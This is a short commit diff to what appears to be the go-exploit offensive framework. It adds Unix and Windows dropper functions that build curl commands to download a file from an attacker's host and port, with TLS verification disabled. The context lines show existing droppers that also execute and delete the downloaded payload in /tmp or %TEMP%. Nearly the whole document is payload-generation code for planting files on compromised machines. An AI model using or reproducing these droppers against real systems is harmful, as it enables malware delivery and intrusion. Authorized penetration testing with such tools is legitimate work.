Added CurlHTTPDownloadOnly

Author: lobsterjerusalem

payload/dropper/unix.go

@@ -6,6 +6,17 @@ import (
 	"github.com/vulncheck-oss/go-exploit/random"
 )
 
+// Download a remote file with curl, but do not execute/delete it.
+// You also need to provide your own full file path, .exe will not be appended like the others.
+// Lastly the full output file path needs to be specified in the output parameter.
+func (unix *UnixPayload) CurlHTTPDownloadOnly(lhost string, lport int, ssl bool, downloadFile string, output string) string {
+	if ssl {
+		return fmt.Sprintf("curl -kso %s https://%s:%d/%s", output, lhost, lport, downloadFile)
+	}
+
+	return fmt.Sprintf("curl -so %s http://%s:%d/%s", output, lhost, lport, downloadFile)
+}
+
 // Download a remote file with curl, execute it, and delete it.
 func (unix *UnixPayload) CurlHTTP(lhost string, lport int, ssl bool, downloadFile string) string {
 	output := "/tmp/" + random.RandLetters(3)

payload/dropper/windows.go

@@ -7,6 +7,17 @@ import (
 	"github.com/vulncheck-oss/go-exploit/random"
 )
 
+// Download a remote file with curl.exe, but do not execute/delete it.
+// You also need to provide your own full file path, .exe will not be appended like the others.
+// Lastly the full output file path needs to be specified in the output parameter.
+func (win *WindowsPayload) CurlHTTPDownloadOnly(lhost string, lport int, ssl bool, downloadFile string, output string) string {
+	if ssl {
+		return fmt.Sprintf("curl.exe -kso %s https://%s:%d/%s", output, lhost, lport, downloadFile)
+	}
+
+	return fmt.Sprintf("curl.exe -so %s http://%s:%d/%s", output, lhost, lport, downloadFile)
+}
+
 // Download a remote file with curl.exe, execute it, and delete it (after execution).
 func (win *WindowsPayload) CurlHTTP(lhost string, lport int, ssl bool, downloadFile string) string {
 	output := `%TEMP%\` + random.RandLetters(3) + ".exe"